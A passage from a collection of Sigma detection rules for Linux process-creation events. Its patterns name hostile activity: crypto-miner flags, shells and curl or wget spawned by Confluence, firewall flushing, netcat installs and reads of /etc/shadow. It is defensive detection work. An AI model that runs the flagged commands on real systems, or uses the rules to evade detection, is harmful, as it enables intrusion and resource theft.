test 4 | description: | 5 | Detects usage of the 'crontab' utility to remove the current crontab. 
6 | This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible 7 | references: 8 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/09/15 11 | tags: 12 | - attack.defense_evasion 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 'crontab' 19 | CommandLine|contains: ' -r' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml: -------------------------------------------------------------------------------- 1 | title: Linux Crypto Mining Indicators 2 | id: 9069ea3c-b213-4c52-be13-86506a227ab1 3 | status: test 4 | description: Detects command line parameters or strings often used by crypto miners 5 | references: 6 | - https://www.poolwatch.io/coin/monero 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/26 9 | modified: 2022/12/25 10 | tags: 11 | - attack.impact 12 | - attack.t1496 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - ' --cpu-priority=' 20 | - '--donate-level=0' 21 | - ' -o pool.' 
22 | - ' --nicehash' 23 | - ' --algo=rx/0 ' 24 | - 'stratum+tcp://' 25 | - 'stratum+udp://' 26 | # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives 27 | - 'sh -c /sbin/modprobe msr allow_writes=on' 28 | # base64 encoded: --donate-level= 29 | - 'LS1kb25hdGUtbGV2ZWw9' 30 | - '0tZG9uYXRlLWxldmVsP' 31 | - 'tLWRvbmF0ZS1sZXZlbD' 32 | # base64 encoded: stratum+tcp:// and stratum+udp:// 33 | - 'c3RyYXR1bSt0Y3A6Ly' 34 | - 'N0cmF0dW0rdGNwOi8v' 35 | - 'zdHJhdHVtK3RjcDovL' 36 | - 'c3RyYXR1bSt1ZHA6Ly' 37 | - 'N0cmF0dW0rdWRwOi8v' 38 | - 'zdHJhdHVtK3VkcDovL' 39 | condition: selection 40 | falsepositives: 41 | - Legitimate use of crypto miners 42 | level: high 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_curl_usage.yml: -------------------------------------------------------------------------------- 1 | title: Curl Usage on Linux 2 | id: ea34fb97-e2c4-4afb-810f-785e4459b194 3 | status: test 4 | description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server 5 | references: 6 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/09/15 9 | tags: 10 | - attack.command_and_control 11 | - attack.t1105 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/curl' 18 | condition: selection 19 | falsepositives: 20 | - Scripts created by developers and admins 21 | - Administrative activity 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml: -------------------------------------------------------------------------------- 1 
| title: Atlassian Confluence CVE-2022-26134 2 | id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66 3 | related: 4 | - id: 245f92e3-c4da-45f1-9070-bc552e06db11 5 | type: derived 6 | status: test 7 | description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 8 | references: 9 | - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/06/03 12 | tags: 13 | - attack.initial_access 14 | - attack.execution 15 | - attack.t1190 16 | - attack.t1059 17 | - cve.2022.26134 18 | logsource: 19 | category: process_creation 20 | product: linux 21 | detection: 22 | selection: 23 | # Monitor suspicious child processes spawned by Confluence 24 | ParentImage|startswith: '/opt/atlassian/confluence/' 25 | ParentImage|endswith: '/java' 26 | CommandLine|contains: 27 | - '/bin/sh' 28 | - 'bash' 29 | - 'dash' 30 | - 'ksh' 31 | - 'zsh' 32 | - 'csh' 33 | - 'fish' 34 | - 'curl' 35 | - 'wget' 36 | - 'python' 37 | condition: selection 38 | falsepositives: 39 | - Unknown 40 | level: high 41 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml: -------------------------------------------------------------------------------- 1 | title: Apache Spark Shell Command Injection - ProcessCreation 2 | id: c8a5f584-cdc8-42cc-8cce-0398e4265de3 3 | status: test 4 | description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective 5 | references: 6 | - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py 7 | - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html 8 | - https://github.com/apache/spark/pull/36315/files 9 | author: Nasreddine Bencherchali (Nextron 
Systems) 10 | date: 2022/07/20 11 | tags: 12 | - attack.initial_access 13 | - attack.t1190 14 | - cve.2022.33891 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | ParentImage|endswith: '\bash' 21 | CommandLine|contains: 22 | - 'id -Gn `' 23 | - "id -Gn '" 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml: -------------------------------------------------------------------------------- 1 | title: DD File Overwrite 2 | id: 2953194b-e33c-4859-b9e8-05948c167447 3 | status: test 4 | description: Detects potential overwriting and deletion of a file using DD. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd 7 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/07/07 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection1: 18 | Image: 19 | - '/bin/dd' 20 | - '/usr/bin/dd' 21 | selection2: 22 | CommandLine|contains: 'of=' 23 | selection3: 24 | CommandLine|contains: 25 | - 'if=/dev/zero' 26 | - 'if=/dev/null' 27 | condition: all of selection* 28 | falsepositives: 29 | - Any user deleting files that way. 
30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml: -------------------------------------------------------------------------------- 1 | title: Ufw Force Stop Using Ufw-Init 2 | id: 84c9e83c-599a-458a-a0cb-0ecce44e807a 3 | status: experimental 4 | description: Detects attempts to force stop the ufw using ufw-init 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/18 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.004 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection_init: 18 | CommandLine|contains|all: 19 | - '-ufw-init' 20 | - 'force-stop' 21 | selection_ufw: 22 | CommandLine|contains|all: 23 | - 'ufw' 24 | - 'disable' 25 | condition: 1 of selection_* 26 | falsepositives: 27 | - Network administrators 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_doas_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Doas Tool Execution 2 | id: 067d8238-7127-451c-a9ec-fa78045b618b 3 | status: stable 4 | description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. 
5 | references: 6 | - https://research.splunk.com/endpoint/linux_doas_tool_execution/ 7 | - https://www.makeuseof.com/how-to-install-and-use-doas/ 8 | author: Sittikorn S, Teoderick Contreras 9 | date: 2022/01/20 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1548 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/doas' 19 | condition: selection 20 | falsepositives: 21 | - Unlikely 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Network Configuration Discovery Via ESXCLI 2 | id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. 
5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | - attack.t1007 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection_img: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains: 'network' 21 | selection_cli: 22 | CommandLine|contains: 23 | - ' get' 24 | - ' list' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Legitimate administration activities 28 | # Note: level can be reduced to low in some envs 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Admin Permission Assigned To Account Via ESXCLI 2 | id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. 
5 | references: 6 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/09/04 9 | tags: 10 | - attack.execution 11 | logsource: 12 | category: process_creation 13 | product: linux 14 | detection: 15 | selection: 16 | Image|endswith: '/esxcli' 17 | CommandLine|contains: 'system' 18 | CommandLine|contains|all: 19 | - ' permission ' 20 | - ' set' 21 | - 'Admin' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Storage Information Discovery Via ESXCLI 2 | id: f41dada5-3f56-4232-8503-3fb7f9cf2d60 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. 
5 | references: 6 | - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html 7 | - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 8 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html 9 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 10 | date: 2023/09/04 11 | tags: 12 | - attack.discovery 13 | - attack.t1033 14 | - attack.t1007 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/esxcli' 21 | CommandLine|contains: 'storage' 22 | selection_cli: 23 | CommandLine|contains: 24 | - ' get' 25 | - ' list' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Legitimate administration activities 29 | # Note: level can be reduced to low in some envs 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Syslog Configuration Change Via ESXCLI 2 | id: 38eb1dbb-011f-40b1-a126-cf03a0210563 3 | status: experimental 4 | description: Detects changes to the ESXi syslog configuration via "esxcli" 5 | references: 6 | - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.001 13 | - attack.t1562.003 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains|all: 21 | - 'system' 22 | - 'syslog' 23 | - 'config' 24 | CommandLine|contains: ' 
set' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administrative activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi System Information Discovery Via ESXCLI 2 | id: e80273e1-9faf-40bc-bd85-dbaff104c4e9 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 8 | author: Cedric Maurugeon 9 | date: 2023/09/04 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | - attack.t1007 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection_img: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains: 'system' 21 | selection_cli: 22 | CommandLine|contains: 23 | - ' get' 24 | - ' list' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml: -------------------------------------------------------------------------------- 1 | title: ESXi Account Creation Via ESXCLI 2 | id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db 3 | status: experimental 4 | description: Detects user account creation on ESXi system via esxcli 5 | references: 6 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html 7 | author: Cedric Maurugeon 
8 | date: 2023/08/22 9 | tags: 10 | - attack.persistence 11 | - attack.t1136 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/esxcli' 18 | CommandLine|contains|all: 19 | - 'system ' 20 | - 'account ' 21 | - 'add ' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi VM List Discovery Via ESXCLI 2 | id: 5f1573a7-363b-4114-9208-ad7a61de46eb 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html 8 | - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ 9 | - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html 10 | author: Cedric Maurugeon 11 | date: 2023/09/04 12 | tags: 13 | - attack.discovery 14 | - attack.t1033 15 | - attack.t1007 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection: 21 | Image|endswith: '/esxcli' 22 | CommandLine|contains: 'vm process' 23 | CommandLine|endswith: ' list' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml: 
-------------------------------------------------------------------------------- 1 | title: ESXi VM Kill Via ESXCLI 2 | id: 2992ac4d-31e9-4325-99f2-b18a73221bb2 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. 5 | references: 6 | - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ 7 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html 8 | - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ 9 | - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html 10 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 11 | date: 2023/09/04 12 | tags: 13 | - attack.execution 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/esxcli' 20 | CommandLine|contains|all: 21 | - 'vm process' 22 | - 'kill' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml: -------------------------------------------------------------------------------- 1 | title: ESXi VSAN Information Discovery Via ESXCLI 2 | id: d54c2f06-aca9-4e2b-81c9-5317858f4b79 3 | status: experimental 4 | description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. 
5 | references: 6 | - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html 7 | - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 8 | - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html 9 | author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon 10 | date: 2023/09/04 11 | tags: 12 | - attack.discovery 13 | - attack.t1033 14 | - attack.t1007 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/esxcli' 21 | CommandLine|contains: 'vsan' 22 | selection_cli: 23 | CommandLine|contains: 24 | - ' get' 25 | - ' list' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Legitimate administration activities 29 | # Note: level can be reduced to low in some envs 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml: -------------------------------------------------------------------------------- 1 | title: File and Directory Discovery - Linux 2 | id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 3 | status: test 4 | description: Detects usage of system utilities to discover files and directories 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2022/11/25 10 | tags: 11 | - attack.discovery 12 | - attack.t1083 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | select_file_with_asterisk: 18 | Image|endswith: '/file' 19 | CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline 20 | select_recursive_ls: 21 | Image|endswith: '/ls' 22 | 
CommandLine|contains: '-R' 23 | select_find_execution: 24 | Image|endswith: '/find' 25 | select_tree_execution: 26 | Image|endswith: '/tree' 27 | condition: 1 of select* 28 | falsepositives: 29 | - Legitimate activities 30 | level: informational 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_file_deletion.yml: -------------------------------------------------------------------------------- 1 | title: File Deletion 2 | id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 3 | status: stable 4 | description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/07 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.004 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/rm' # covers /rmdir as well 20 | - '/shred' 21 | - '/unlink' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: informational 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml: -------------------------------------------------------------------------------- 1 | title: OS Architecture Discovery Via Grep 2 | id: d27ab432-2199-483f-a297-03633c05bae6 3 | status: experimental 4 | description: | 5 | Detects the use of grep to identify information about the operating system architecture. 
Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" 6 | references: 7 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 8 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 9 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 10 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 11 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 12 | date: 2023/06/02 13 | tags: 14 | - attack.discovery 15 | - attack.t1082 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_process: 21 | Image|endswith: '/grep' 22 | selection_architecture: 23 | CommandLine|endswith: 24 | - 'aarch64' 25 | - 'arm' 26 | - 'i386' 27 | - 'i686' 28 | - 'mips' 29 | - 'x86_64' 30 | condition: all of selection_* 31 | falsepositives: 32 | - Unknown 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_groupdel.yml: -------------------------------------------------------------------------------- 1 | title: Group Has Been Deleted Via Groupdel 2 | id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 3 | status: test 4 | description: Detects execution of the "groupdel" binary. Which is used to delete a group. 
This is sometimes abused by threat actors in order to cover their tracks 5 | references: 6 | - https://linuxize.com/post/how-to-delete-group-in-linux/ 7 | - https://www.cyberciti.biz/faq/linux-remove-user-command/ 8 | - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ 9 | - https://linux.die.net/man/8/groupdel 10 | author: Tuan Le (NCSGroup) 11 | date: 2022/12/26 12 | tags: 13 | - attack.impact 14 | - attack.t1531 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/groupdel' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrator activities 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml: -------------------------------------------------------------------------------- 1 | title: Apt GTFOBin Abuse - Linux 2 | id: bb382fd5-b454-47ea-a264-1828e4c766d6 3 | status: test 4 | description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution 5 | references: 6 | - https://gtfobins.github.io/gtfobins/apt/ 7 | - https://gtfobins.github.io/gtfobins/apt-get/ 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2022/12/28 10 | tags: 11 | - attack.discovery 12 | - attack.t1083 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/apt' 20 | - '/apt-get' 21 | CommandLine|contains: 'APT::Update::Pre-Invoke::=' 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml: -------------------------------------------------------------------------------- 1 | title: Vim GTFOBin Abuse - Linux 2 | id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea 3 | status: test 4 | 
description: Detects usage of "vim" and its siblings as a GTFOBin to execute and proxy command and binary execution
| -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Package Installed - Linux 2 | id: 700fb7e8-2981-401c-8430-be58e189e741 3 | status: test 4 | description: Detects installation of suspicious packages using system installation utilities 5 | references: 6 | - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/01/03 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1553.004 12 | logsource: 13 | product: linux 14 | category: process_creation 15 | detection: 16 | selection_tool_apt: 17 | Image|endswith: 18 | - '/apt' 19 | - '/apt-get' 20 | CommandLine|contains: 'install' 21 | selection_tool_yum: 22 | Image|endswith: '/yum' 23 | CommandLine|contains: 24 | - 'localinstall' 25 | - 'install' 26 | selection_tool_rpm: 27 | Image|endswith: '/rpm' 28 | CommandLine|contains: '-i' 29 | selection_tool_dpkg: 30 | Image|endswith: '/dpkg' 31 | CommandLine|contains: 32 | - '--install' 33 | - '-i' 34 | selection_keyword: 35 | CommandLine|contains: 36 | # Add more suspicious packages 37 | - 'nmap' 38 | - ' nc' 39 | - 'netcat' 40 | - 'wireshark' 41 | - 'tshark' 42 | - 'openconnect' 43 | - 'proxychains' 44 | condition: 1 of selection_tool_* and selection_keyword 45 | falsepositives: 46 | - Legitimate administration activities 47 | level: medium 48 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml: -------------------------------------------------------------------------------- 1 | title: Flush Iptables Ufw Chain 2 | id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab 3 | status: experimental 4 | description: Detect use of 
iptables to flush all firewall rules, tables and chains and allow all network traffic 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html 8 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/01/18 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.004 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_img: 19 | Image|endswith: 20 | - '/iptables' 21 | - '/xtables-legacy-multi' 22 | - '/iptables-legacy-multi' 23 | - '/ip6tables' 24 | - '/ip6tables-legacy-multi' 25 | selection_params: 26 | CommandLine|contains: 27 | - '-F' 28 | - '-Z' 29 | - '-X' 30 | selection_ufw: 31 | CommandLine|contains: 32 | - 'ufw-logging-deny' 33 | - 'ufw-logging-allow' 34 | - 'ufw6-logging-deny' 35 | - 'ufw6-logging-allow' 36 | # - 'ufw-reject-output' 37 | # - 'ufw-track-inputt' 38 | condition: all of selection_* 39 | falsepositives: 40 | - Network administrators 41 | level: medium 42 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_kill_process.yml: -------------------------------------------------------------------------------- 1 | title: Terminate Linux Process Via Kill 2 | id: 64c41342-6b27-523b-5d3f-c265f3efcdb3 3 | status: experimental 4 | description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. 
5 | references: 6 | - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html 7 | - https://www.cyberciti.biz/faq/how-force-kill-process-linux/ 8 | author: Tuan Le (NCSGroup) 9 | date: 2023/03/16 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/kill' 20 | - '/pkill' 21 | - '/killall' 22 | condition: selection 23 | falsepositives: 24 | - Likely 25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_local_account.yml: -------------------------------------------------------------------------------- 1 | title: Local System Accounts Discovery - Linux 2 | id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c 3 | status: test 4 | description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/08 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1087.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/lastlog' 19 | selection_2: 20 | CommandLine|contains: '''x:0:''' 21 | selection_3: 22 | Image|endswith: 23 | - '/cat' 24 | - '/head' 25 | - '/tail' 26 | - '/more' 27 | CommandLine|contains: 28 | - '/etc/passwd' 29 | - '/etc/shadow' 30 | - '/etc/sudoers' 31 | selection_4: 32 | Image|endswith: '/id' 33 | selection_5: 34 | Image|endswith: '/lsof' 35 | CommandLine|contains: '-u' 36 | condition: 1 of selection* 37 | falsepositives: 38 | - Legitimate administration activities 39 | level: low 40 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_local_groups.yml: -------------------------------------------------------------------------------- 1 | title: Local Groups Discovery - Linux 2 | id: 676381a6-15ca-4d73-a9c8-6a22e970b90d 3 | status: test 4 | description: Detects enumeration of local system groups. 
